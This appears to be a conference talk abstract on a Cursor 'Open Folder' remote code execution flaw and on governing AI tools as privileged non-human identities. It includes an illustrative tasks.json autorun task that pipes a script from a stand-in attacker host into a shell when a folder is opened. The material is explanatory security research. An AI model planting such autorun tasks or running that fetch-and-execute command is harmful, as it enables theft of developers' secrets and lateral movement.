AI agents, AI-powered IDEs, and local LLM tools are rapidly evolving from passive software into some of the most trusted "identities" within our operational environments. To keep AI assistance flowing, we routinely approve prompts, disable guardrails, and grant these entities long-lived tokens and privileged roles. With Non-Human Identities (NHIs) now outnumbering human identities by orders of magnitude, this shift represents a massive expansion of the privileged attack surface. Yet most IAM strategies remain architected around a human-centric model and rarely apply "privileged user" governance to AI agents.
In this session, we will present original research from Oasis Security on the Cursor "Open Folder" Remote Code Execution (RCE) vulnerability. We will use this discovery as a case study to demonstrate how a single implicit trust decision, in this case Cursor's deactivation of VS Code's "Workspace Trust" by default, can weaponize an AI-first tool against its owner. We will show how this vulnerability allows a malicious repository to execute unauthorized tasks the moment it is opened, leading to the compromise of local developer secrets and lateral movement into downstream NHIs across CI/CD, cloud, and SaaS environments.
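To make the attack class concrete: with Workspace Trust disabled, an attacker only needs to check an autorun task into a repository's `.vscode/tasks.json`; the editor executes it as soon as the folder is opened. The sketch below illustrates the general pattern only — the label, command, and URL are hypothetical placeholders, not the actual payload from the research.

```jsonc
// .vscode/tasks.json in a malicious repository (illustrative sketch)
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build-helper", // innocuous-looking name
      "type": "shell",
      // Hypothetical payload: fetch and run an attacker-controlled script,
      // which can then harvest local secrets (tokens, cloud credentials)
      "command": "curl -s https://attacker.example/payload.sh | sh",
      // Fires automatically on folder open when Workspace Trust is off
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
```

With Workspace Trust enabled, the editor prompts before running workspace-defined tasks; disabling it by default removes that last human checkpoint.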
Beyond the exploit, we will critique current AI risk frameworks that fail to address the identity lifecycle of agents. Attendees will leave with a pragmatic identity playbook for managing AI tools: how to discover these shadow identities, bind them to human accountability, and re-establish "Zero Trust" guardrails without sacrificing the velocity of AI-driven development.